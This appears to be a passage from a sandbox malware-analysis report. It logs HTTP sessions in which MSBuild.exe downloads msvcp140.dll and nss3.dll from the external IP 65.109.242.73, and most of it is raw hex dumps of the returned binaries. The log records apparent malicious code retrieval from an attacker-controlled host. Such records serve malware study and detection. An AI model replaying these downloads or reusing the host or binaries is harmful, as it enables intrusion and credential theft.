                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                            Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                            Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                            Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                            Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                            2024-04-18 08:10:35 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                            Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            13192.168.2.44975065.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:36 UTC158OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:37 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:37 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:37 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                            2024-04-18 08:10:37 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                            Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                            2024-04-18 08:10:37 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                            Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                            2024-04-18 08:10:37 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                            Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                            2024-04-18 08:10:38 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                            Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                            2024-04-18 08:10:38 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                            Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                            2024-04-18 08:10:38 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                            Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                            2024-04-18 08:10:38 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                            Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                            2024-04-18 08:10:38 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                            Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                            2024-04-18 08:10:38 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                            Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            14192.168.2.44975165.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:39 UTC154OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:39 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:39 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:39 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                            2024-04-18 08:10:39 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                            Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                            Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                            Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
